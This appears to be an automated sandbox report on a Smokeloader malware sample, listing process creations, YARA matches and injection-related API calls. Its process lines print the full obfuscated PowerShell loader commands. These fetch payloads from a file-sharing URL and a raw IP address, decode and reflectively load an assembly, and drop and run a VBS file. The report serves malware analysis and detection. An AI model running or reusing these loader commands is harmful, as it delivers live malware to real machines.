Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 6168, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,	13_2_00402F5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_00402321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004025D3 NtClose,	13_2_004025D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402686 NtClose,	13_2_00402686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,	13_2_004030BF
Source: C:\Windows\explorer.exe	Code function: 14_2_03444760 NtCreateSection,	14_2_03444760
Source: C:\Windows\explorer.exe	Code function: 14_2_03442FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,	14_2_03442FAC
